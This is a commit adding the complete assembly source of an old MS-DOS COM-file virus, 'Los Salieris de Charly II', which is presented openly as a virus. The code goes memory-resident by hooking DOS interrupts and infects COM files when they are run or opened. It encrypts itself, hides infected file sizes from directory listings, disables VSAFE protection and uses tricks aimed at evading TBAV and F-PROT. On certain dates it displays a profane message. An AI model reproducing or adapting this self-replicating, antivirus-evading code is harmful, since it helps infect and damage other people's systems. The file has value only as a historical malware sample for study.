Add files via upload

2026-06-16 07:49:24 +00:00 · 2021-01-12 17:34:47 -06:00
parent d3381d8e02
commit 99a7802ac0
99 changed files with 50186 additions and 0 deletions
@@ -0,0 +1,637 @@
+;
+; Virus   Los Salieris de Charly II (para compilar normal).
+;	  (Stealth with TBAV, VSAFE, DIR, NC and MEM)
+;
+;	  Created by: Ramthes Jones'94 (For Those About to Rock!!
+;	  (AHORA SI QUE EL TBAV ME LA CHUPA BIEN!!!)
+;
+; Fuente de mierda! hasta donde pensas llegar? porque estos gatos
+; solo hablan en ingles... grrr! desencriptan pero no traducen.
+;
+; DANGER!!: What you're gonna read could be bad for your health!
+;	    Please! try to understand... my prgs don't run...
+;	    they creep >:-D  he he he!
+;
+CODE SEGMENT
+
+	.286c
+	ASSUME	CS:CODE, DS:CODE, ES:CODE
+	ORG	100h
+
+START:
+	JMP	COMIENZO
+	NOP
+	NOP
+	NOP
+	INT	20h
+
+COMIENZO:
+ONE	LABEL	BYTE
+	INT	03h	     ; This piece o'shit's for TBAV :( :::
+	MOV	BX,0107h
+	PUSH	BX
+	MOV	AH,0Dh	     ; ??? What?????????!
+	MOV	CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE)
+	MOV	SI,(OFFSET DESDE_ACA - OFFSET ONE)
+	ADD	SI,BX
+DESENCRIPTO:
+	MOV	DL,CS:[((NUMERO - OFFSET ONE) + BX)]
+	XOR	[SI],DL
+	INC	SI
+	XOR	AH,AH	     ; This shit's for F-PROT
+	INT	02h	     ; This shit's for TBAV
+	LOOP	DESENCRIPTO
+
+	JMP	DESDE_ACA
+	INT	21h
+
+	MOV	AX,4C00h
+	INT	21h
+
+DESDE_ACA:
+	MOV	AX,0CACAh
+	INT	21h
+	CMP	AX,0FEDEh
+	JE	CORRE_PROG_1
+	JMP	CHUPAMELA
+CORRE_PROG_1:
+	JMP	CORRE_PROG
+
+CHUPAMELA:
+	PUSH	AX
+	PUSH	DX
+	MOV	AX,0FA01h
+	MOV	DX,5945h
+	INT	21h
+	POP	DX
+	POP	AX
+
+	MOV	AH,4Ah
+	XOR	BX,BX
+	INT	21h
+
+	MOV	AH,4Ah
+	MOV	BX,0FFFFh
+	INT	21h
+
+	SUB	BX,101h
+	MOV	AH,4Ah
+	INT	21h
+
+	MOV	AH,48h
+	MOV	BX,100h
+	INT	21h
+
+	MOV	ES,AX
+	PUSH	ES
+	DEC	AX
+	MOV	ES,AX
+	MOV	ES:WORD PTR [0001h], 0008h
+	POP	ES
+
+	PUSH	CS
+	POP	DS
+
+	POP	SI
+	PUSH	SI
+	XOR	DI,DI
+	MOV	CX,OFFSET TWO - OFFSET ONE
+	CLD
+	REP	MOVSB
+
+	PUSH	ES
+	POP	DS
+
+	MOV	AX,3521h
+	INT	21h
+	POP	SI
+	PUSH	SI
+	MOV	DS:[INT21IP - OFFSET ONE],BX
+	MOV	DS:[INT21CS - OFFSET ONE],ES
+
+	MOV	AX,2521h
+	MOV	DX,(OFFSET HOOK_21 - OFFSET ONE)
+	INT	21h
+
+	MOV	AH,04h
+	INT	1Ah
+	CMP	DX,0526h
+	JE	JODE_2
+	CMP	DX,1126h
+	JE	JODE_2
+	CMP	DX,1021h
+	JE	JODE_2
+	JMP	NO_JODE
+JODE_2:
+	MOV	AX,3513h
+	INT	21h
+	MOV	DS:[INT17IP - OFFSET ONE],BX
+	MOV	DS:[INT17CS - OFFSET ONE],ES
+
+	MOV	AX,2513h
+	MOV	DX,(OFFSET HOOK_13 - OFFSET ONE)
+	INT	21h
+NO_JODE:
+	PUSH	CS
+	PUSH	CS
+	POP	DS
+	POP	ES
+
+CORRE_PROG:
+	POP	BX
+
+	MOV	DI,100h
+	LEA	SI,[(NORMAL - OFFSET ONE) + BX]
+	MOVSW
+	MOVSB
+
+	PUSH	CS
+	PUSH	0100h
+	RETF
+
+HOOK_21 PROC	FAR
+	PUSH	DS
+	PUSHF
+	PUSH	AX
+	PUSH	BX
+	PUSH	CX
+	PUSH	DX
+	PUSH	SI
+	PUSH	DI
+	PUSH	DS
+	PUSH	ES
+
+	CMP	AX,0CACAh
+	JE	RESIDE
+	CMP	AH,4Bh
+	JE	INFECTA1
+	CMP	AH,3Dh
+	JE	INFECT_FAST1
+	CMP	AH,4Eh
+	JE	NO_NC
+	CMP	AH,4Fh
+	JE	NO_NC
+	CMP	AH, 11h
+	JE	NO_DIR
+	CMP	AH, 12h
+	JE	NO_DIR
+	JMP	FIN
+
+INFECTA1:	JMP INFECTA
+INFECT_FAST1:	JMP INFECT_FAST
+RESIDE:
+	POP	ES
+	POP	DS
+	POP	DI
+	POP	SI
+	POP	DX
+	POP	CX
+	POP	BX
+	POP	AX
+
+	POPF
+	POP	DS
+	MOV	AX,0FEDEh
+	IRET
+
+NO_DIR	PROC
+	POP	ES
+	POP	DS
+	POP	DI
+	POP	SI
+	POP	DX
+	POP	CX
+	POP	BX
+	POP	AX
+	POPF
+	POP	DS
+
+	PUSH	CX
+	PUSH	BX
+	PUSH	ES
+
+	PUSH	AX
+	MOV	AH,2Fh
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	POP	AX
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	PUSH	AX
+	PUSHF
+	OR	AL,AL
+	JNE	FINHANDLER2
+	CMP	BYTE PTR ES:[BX],0FFh
+	JNE	NOEXTENDED
+	ADD	BX,07h
+
+NOEXTENDED:
+	MOV	CX,ES:[BX+17h]
+	AND	CL,00011111b
+	CMP	CL,00001101b
+	JNE	FINHANDLER2
+	SUB	WORD PTR ES:[BX+1Dh],OFFSET TWO - OFFSET ONE  ;LE RESTO EL VALOR DEL PRG
+	SBB	WORD PTR ES:[BX+1Fh],0
+FINHANDLER2:
+	POPF
+	POP	AX
+	POP	ES
+	POP	BX
+	POP	CX
+	RETF	0002h
+NO_DIR	ENDP
+
+NO_NC	PROC
+	POP	ES
+	POP	DS
+	POP	DI
+	POP	SI
+	POP	DX
+	POP	CX
+	POP	BX
+	POP	AX
+	POPF
+	POP	DS
+
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	PUSHF
+	PUSH	AX
+	PUSH	BX
+	PUSH	CX
+	PUSH	ES
+
+	MOV	AH,2Fh
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	CX,ES:[BX+16h]
+	AND	CL,00011111b
+	CMP	CL,00001101b
+	JE	SI_RECUBRO
+	JMP	NO_RECUBRO
+
+SI_RECUBRO:
+	SUB	WORD PTR ES:[BX+1Ah],OFFSET TWO - OFFSET ONE  ;LE RESTO EL VALOR DEL PRG
+
+NO_RECUBRO:
+	POP	ES
+	POP	CX
+	POP	BX
+	POP	AX
+	POPF
+	RETF	2
+NO_NC	ENDP
+
+FIN_1:	JMP	FIN
+
+INFECT_FAST:
+	MOV	SI,DX
+BUCLE:
+	CMP	BYTE PTR [SI],"."
+	JE	YASTA
+	CMP	BYTE PTR [SI],00h
+	JE	FIN_1
+	INC	SI
+	JMP	BUCLE
+YASTA:
+	PUSH	SI
+BUCLE2:
+	CMP	BYTE PTR [SI],"\"
+	JE	YASTA2
+	CMP	SI,DX
+	JNE	NOSTA2
+	DEC	SI
+	JMP	YASTA2
+NOSTA2:
+	DEC	SI
+	JMP	BUCLE2
+YASTA2:
+	INC	SI
+	MOV	AX,[SI]
+	OR	AX,2020h
+	CMP	AX,"oc"
+	JNE	DALEPUES
+	INC	SI
+	INC	SI
+	MOV	AX,[SI]
+	OR	AX,2020h
+	CMP	AX,"mm"
+	JNE	DALEPUES
+	POP	SI
+	JMP	FIN_1
+
+DALEPUES:
+	POP	SI
+	INC	SI
+	MOV	AX,[SI]
+	OR	AX,2020h
+	CMP	AX,"oc"
+	JNE	FIN_1
+
+INFECTA:
+	PUSH	AX
+	PUSH	BX
+	PUSH	DX
+	PUSH	DS
+	PUSH	ES
+
+	MOV	AX, CS
+	MOV	DS, AX
+	MOV	AX,3524h
+	PUSHF
+	CALL	DWORD PTR DS:[INT21IP - OFFSET ONE]
+	MOV	DS:[INT24IP - OFFSET ONE],BX
+	MOV	DS:[INT24CS - OFFSET ONE],ES
+
+	MOV	AX,2524h
+	MOV	DX,(OFFSET HOOK_24 - OFFSET ONE)
+	PUSHF
+	CALL	DWORD PTR DS:[INT21IP - OFFSET ONE]
+	POP	ES
+	POP	DS
+	POP	DX
+	POP	BX
+	POP	AX
+
+	PUSH	DX
+	PUSH	DX
+
+	CALL	REMUEVE_BITS
+
+	POP	DX
+	MOV	AX,4300h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	MOV	CS:[(ATRIBUTOS - OFFSET ONE)],CX
+
+	MOV	AX,4301h
+	MOV	CX,20h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	JC	FINAL_1
+
+	MOV	AX,3D02h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	PUSH	AX
+	POP	BX
+
+	MOV	AH,3Fh
+	MOV	CX,2
+	PUSH	CS
+	POP	DS
+	MOV	DX,(OFFSET NORMAL - OFFSET ONE)
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	XOR	SI,SI
+	MOV	AL,CS:(NORMAL - OFFSET ONE)[SI]
+	CMP	AL,'M'
+	JE	FINAL_1
+	INC	SI
+	MOV	AL,CS:(NORMAL - OFFSET ONE)[SI]
+	CMP	AL,'Z'
+	JE	FINAL_1
+	JMP	CONTI
+FINAL_1:
+	JMP	FINAL
+
+CONTI:
+	MOV	AX,5700h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	MOV	CS:[(HORA - OFFSET ONE)],CX
+	MOV	CS:[(FECHA - OFFSET ONE)],DX
+
+	AND	CL,00011111b	; Esto es lo correcto para comprobar
+	CMP	CL,00001101b	;  si los segundos son 26
+	JE	FINAL_1
+
+	MOV	AX,4200h
+	CWD
+	MOV	CX,DX
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AH,3Fh
+	MOV	CX,3
+	PUSH	CS
+	POP	DS
+	MOV	DX,(OFFSET NORMAL - OFFSET ONE)
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AX,4202h
+	CWD
+	MOV	CX,DX
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	PUSH	AX
+
+	SUB	AX,3
+
+	MOV	SI,1
+	MOV	CS:(BUFFER - OFFSET ONE)[SI],AL
+	INC	SI
+	MOV	CS:(BUFFER - OFFSET ONE)[SI],AH
+
+;	PUSH	AX	;MIERDA1
+
+	MOV	AH,2Ch
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	MOV	CS:[NUMERO - OFFSET ONE],DL
+
+	PUSH	BX
+	MOV	AH,48h
+	MOV	BX,150h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	MOV	ES,AX
+	POP	BX
+
+	PUSH	CS
+	POP	DS
+
+	XOR	SI,SI
+	MOV	DI,SI
+	MOV	CX,OFFSET TWO - OFFSET ONE
+	CLD
+	REP	MOVSB
+
+	PUSH	ES
+	POP	DS
+
+	POP	AX			;LL
+	INC	AH
+	XOR	SI,SI			;LL
+	MOV	ES:[SI + 2],AL		;OPA
+	MOV	ES:[SI + 3],AH
+
+	MOV	CX,(OFFSET INCRIPT - OFFSET ONE) - (OFFSET DESDE_ACA - OFFSET ONE)
+	MOV	SI,(OFFSET DESDE_ACA - OFFSET ONE)
+ENCRIPTO:
+	XOR	[SI],DL
+	INC	SI
+	LOOP	ENCRIPTO
+
+	MOV	AH,40h
+	MOV	CX,OFFSET TWO - OFFSET ONE
+	XOR	DX,DX
+	PUSH	ES
+	POP	DS
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+	JC	FINAL
+
+	MOV	AH,49h
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AX,4200h
+	CWD
+	MOV	CX,DX
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AH,40h
+	MOV	CX,3
+	MOV	DX,(OFFSET BUFFER - OFFSET ONE)
+	PUSH	CS
+	POP	DS
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AX,5701h
+	MOV	CX,CS:[(HORA - OFFSET ONE)]
+	AND	CL,11100000b
+	OR	CL,00001101b
+	MOV	DX,CS:[(FECHA - OFFSET ONE)]
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+FINAL:
+	MOV	AH,3Eh
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	MOV	AX,4301h
+	MOV	CX,CS:[(ATRIBUTOS - OFFSET ONE)]
+	POP	DX
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP - OFFSET ONE]
+
+	CALL	RESTAURA_BITS
+
+	MOV	AX,2524h
+	MOV	DX,CS:[INT24IP - OFFSET ONE]
+	MOV	DS,CS:[INT24CS - OFFSET ONE]
+	PUSHF
+	CALL	DWORD PTR CS:[INT21IP-OFFSET ONE]
+
+FIN:
+	POP	ES
+	POP	DS
+	POP	DI
+	POP	SI
+	POP	DX
+	POP	CX
+	POP	BX
+	POP	AX
+
+	POPF
+	POP	DS
+	JMP	DWORD PTR CS:[(INT21IP - OFFSET ONE)]
+HOOK_21 ENDP
+
+HOOK_13 PROC
+	PUSHF
+	PUSH	AX
+	PUSH	BX
+	PUSH	CX
+	PUSH	SI
+	XOR	BX,BX
+	MOV	SI,31
+	MOV	CX,75
+ESCRIBE:
+	MOV	AH,0Eh
+	MOV	AL,CS:(TEXTO - OFFSET ONE)[SI]
+	INT	10h
+	INC	SI
+	LOOP	ESCRIBE
+	POP	SI
+	POP	CX
+	POP	BX
+	POP	AX
+	POPF
+	JMP	DWORD PTR CS:[(INT17IP - OFFSET ONE)]
+HOOK_13 ENDP
+
+HOOK_24 PROC
+	XOR	AL,AL
+	IRET
+HOOK_24 ENDP
+
+V_SAFE	PROC
+	MOV	AH,0FAh
+	MOV	DX,5945h
+	INT	21h
+	RET
+V_SAFE	ENDP
+
+VERIFICA_RESIDENCIA	PROC
+	XOR	AL,AL
+	CALL	V_SAFE
+	CMP	BX,2F00h
+	JE	FORI
+	STC
+FORI:	RET
+VERIFICA_RESIDENCIA	ENDP
+
+REMUEVE_BITS	PROC
+	CALL	VERIFICA_RESIDENCIA
+	JC	FORI_1
+	MOV	AL,02h
+	MOV	BL,00000000b
+	CALL	V_SAFE
+	MOV	CS:[SEBA-OFFSET ONE],CL
+FORI_1:
+	CLC
+	RET
+REMUEVE_BITS	ENDP
+
+RESTAURA_BITS	PROC
+	CALL	VERIFICA_RESIDENCIA
+	JC	FORI_2
+	MOV	AL,02
+	MOV	BL,CS:[SEBA-OFFSET ONE]
+	CALL	V_SAFE
+FORI_2:
+	CLC
+	RET
+RESTAURA_BITS	ENDP
+
+INT21IP DW 0
+INT21CS DW 0
+INT24IP DW 0
+INT24CS DW 0
+INT17IP DW 0
+INT17CS DW 0
+ATRIBUTOS DW 0
+SEBA	DB 1
+HORA	DW 0
+FECHA	DW 0
+BUFFER	DB 3 DUP(0E9h)
+NORMAL	DB 3 DUP(90h)
+TEXTO	DB "VIRUS LOS SALIERIS DE CHARLY 2."
+	DB "AIN'T A HACKER,"
+	DB "AIN'T A CRACKER,"
+	DB "I AM ONLY A MOTHERFUCKER."
+	DB 'DEDICATED TO "MACA"'
+INCRIPT LABEL	BYTE
+NUMERO	DB 1 DUP(0)
+
+TWO	LABEL	BYTE
+
+CODE ENDS
+END START